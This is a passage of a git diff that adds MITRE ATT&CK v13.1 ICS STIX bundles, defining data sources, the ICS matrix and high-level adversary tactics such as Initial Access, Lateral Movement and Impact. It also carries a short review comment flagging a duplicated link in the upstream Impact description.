+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json
new file mode 100644
index 0000000000000000000000000000000000000000..471cb57dd046e138a10e6fe412ba8dbfeaeb76a3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json
@@ -0,0 +1,43 @@
+{
+ "type": "bundle",
+ "id": "bundle--1243dda8-213f-4f76-bf7d-18c978655739",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.265Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0001",
+ "external_id": "DS0001"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.805Z",
+ "name": "Firmware",
+ "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json
new file mode 100644
index 0000000000000000000000000000000000000000..266f09269b6f5af00265ef7714726c2f461256cb
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json
@@ -0,0 +1,53 @@
+{
+ "type": "bundle",
+ "id": "bundle--7fd672de-717d-425e-894c-d7482e0324f2",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0019",
+ "external_id": "DS0019"
+ },
+ {
+ "source_name": "Microsoft Services",
+ "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications"
+ },
+ {
+ "source_name": "Linux Services Run Levels",
+ "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.",
+ "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.807Z",
+ "name": "Service",
+ "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json
new file mode 100644
index 0000000000000000000000000000000000000000..233d414fcf3c33e1873b9622f44f15e664318cc8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json
@@ -0,0 +1,53 @@
+{
+ "type": "bundle",
+ "id": "bundle--6b85be98-7ef3-4023-8bcc-0a3a305a1d04",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-04-20T18:38:26.515Z",
+ "name": "Process",
+ "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)",
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0009",
+ "external_id": "DS0009"
+ },
+ {
+ "source_name": "Microsoft Processes and Threads",
+ "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json
new file mode 100644
index 0000000000000000000000000000000000000000..eed3022879bb151a4644f9bce936321f71da68ba
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json
@@ -0,0 +1,53 @@
+{
+ "type": "bundle",
+ "id": "bundle--f02f25b8-af6d-4504-885b-6ce250253d70",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0011",
+ "external_id": "DS0011"
+ },
+ {
+ "source_name": "Microsoft LoadLibrary",
+ "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya"
+ },
+ {
+ "source_name": "Microsoft Module Class",
+ "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.806Z",
+ "name": "Module",
+ "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-matrix/x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-matrix/x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7.json
new file mode 100644
index 0000000000000000000000000000000000000000..83fc689222a1c3228d4e5c99697f37ac0f405403
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-matrix/x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7.json
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--43dd6c40-9639-4d4b-9073-a303920f2939", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created": "2018-10-17T00:14:20.652Z", + "description": "The full ATT&CK for ICS Matrix includes techniques spanning various ICS assets and can be used to navigate through the knowledge base.", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "ics-attack", + "url": "https://attack.mitre.org/matrices/ics/" + } + ], + "id": "x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7", + "modified": "2022-05-06T17:47:24.396Z", + "name": "ATT&CK for ICS", + "type": "x-mitre-matrix", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134.json new file mode 100644 index 0000000000000000000000000000000000000000..67ba79adcc6f8b8e5d7f00320b7a50bb0a3c8180 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--00cb1983-fde3-4f67-b940-728391fd147c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:52.701Z", + "name": "Inhibit Response Function", + "description": "The adversary is trying to prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state.\n\nInhibit Response Function consists of techniques that adversaries use to hinder the safeguards put in place for processes and products. This may involve the inhibition of safety, protection, quality assurance, or operator intervention functions to disrupt safeguards that aim to prevent the loss of life, destruction of equipment, and disruption of production. These techniques aim to actively deter and prevent expected alarms and responses that arise due to statuses in the ICS environment. Adversaries may modify or update system logic, or even outright prevent responses with a denial-of-service. They may result in the prevention, destruction, manipulation, or modification of programs, logic, devices, and communications. As prevention functions are generally dormant, reporting and processing functions can appear fine, but may have been altered to prevent failure responses in dangerous scenarios. Unlike [Evasion](https://attack.mitre.org/tactics/TA0103), Inhibit Response Function techniques may be more intrusive, such as actively preventing responses to a known dangerous scenario. 
Adversaries may use these techniques to follow through with or provide cover for [Impact](https://attack.mitre.org/tactics/TA0105) techniques.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "inhibit-response-function", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0107", + "external_id": "TA0107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046.json new file mode 100644 index 0000000000000000000000000000000000000000..fad6920df265caf8a8ecfab5b0790669ed21e63b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--66fa705a-be3f-4a82-a4c8-67ed73e9305d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-29T21:38:48.906Z", + "name": "Privilege Escalation", + "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "privilege-escalation", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "created": "2021-04-10T17:32:33.899Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0111", + "external_id": "TA0111" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924.json new file mode 100644 index 0000000000000000000000000000000000000000..311a6f3c515e3a3ab28a2fd3410684e54cd0ed49 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--eec92533-5458-4714-ada6-c40f0fc7b459", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:09:46.867Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your ICS environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. These techniques abuse default credentials, known accounts, and vulnerable services, and may also leverage dual-homed devices and systems that reside on both the IT and OT networks. The adversary uses these techniques to pivot to their next point in the environment, positioning themselves to where they want to be or think they should be. Following through on their primary objective often requires [Discovery](https://attack.mitre.org/tactics/TA0102) of the network and [Collection](https://attack.mitre.org/tactics/TA0100) to develop awareness of unique ICS devices and processes, in order to find their target and subsequently gain access to it. Reaching this objective often involves pivoting through multiple systems, devices, and accounts. 
Adversaries may install their own remote tools to accomplish Lateral Movement or leverage default tools, programs, and manufacturer set or other legitimate credentials native to the network, which may be stealthier.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "lateral-movement", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0109", + "external_id": "TA0109" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453.json new file mode 100644 index 0000000000000000000000000000000000000000..972e96fa2512a7ababebda1a488e4642838c80eb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dde05676-f9ba-452f-8bef-20b83bd49267", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Discovery", + "description": "The adversary is locating information to assess and identify their targets in your environment.\n\nDiscovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "discovery", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0102", + "external_id": "TA0102" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a.json new file mode 100644 index 0000000000000000000000000000000000000000..a24910c84f0e3fd4c40f66e8692718449f27f492 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1be20e95-6785-4829-a519-8883a923217e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your ICS environment.\n\nInitial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. 
Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "initial-access", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0108", + "external_id": "TA0108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279.json new file mode 100644 index 0000000000000000000000000000000000000000..ca2acca15c026cbc6c392de0fa9e4bfc4cec632b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--b1549907-b685-4a04-9f14-cc7ddfcaf1bf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:22:09.571Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment.\n\nImpact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage [Impair Process Control](https://attack.mitre.org/tactics/TA0106) techniques, which often manifest in more self-revealing impacts on operations, or [Impair Process Control](https://attack.mitre.org/tactics/TA0106) techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary\u2019s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.\n\n[Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828), [Theft of Operational Information](https://attack.mitre.org/techniques/T0882), and [Damage to Property](https://attack.mitre.org/techniques/T0879) are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. 
These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "impact", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279", + "created": "2019-03-14T18:44:44.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0105", + "external_id": "TA0105" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac.json new file mode 100644 index 0000000000000000000000000000000000000000..2f95bd08c63ba84dab90466fae2c35c17701e4ee --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac.json 
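Review bot: The Impact description in this hunk links [Impair Process Control](TA0106) twice in the same sentence, and the second clause ("techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact") describes what this same commit's Inhibit Response Function tactic (TA0107) defines for itself, so the second link looks like an upstream copy error in the MITRE text. Because this is vendored ATT&CK v13.1 data, it should not be hand-patched here; instead record it as a known upstream defect (or pin a corrected upstream release) so that anything deriving tactic relationships from these descriptions does not link Impact back to TA0106 twice. The rest of the bundle in this hunk is upstream content and needs no local change.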
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--263ad2ee-d011-486d-b84a-e02c2c6b8eb5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Persistence", + "description": "The adversary is trying to maintain their foothold in your ICS environment.\n\nPersistence consists of techniques that adversaries use to maintain access to ICS systems and devices across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that allow them to secure their ongoing activity and keep their foothold on systems. This may include replacing or hijacking legitimate code, firmware, and other project files, or adding startup code and downloading programs onto devices.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "persistence", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0110", + "external_id": "TA0110" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45.json new file mode 100644 index 0000000000000000000000000000000000000000..9f6c125393a81ad60c8d3284634d05106e3fec32 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--a24543db-962c-4997-be6a-6679c680b570", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:19:16.160Z", + "name": "Execution", + "description": "The adversary is trying to run code or manipulate system functions, parameters, and data in an unauthorized way.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network [Discovery](https://attack.mitre.org/tactics/TA0102) and [Collection](https://attack.mitre.org/tactics/TA0100), impact operations, and inhibit response functions.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": 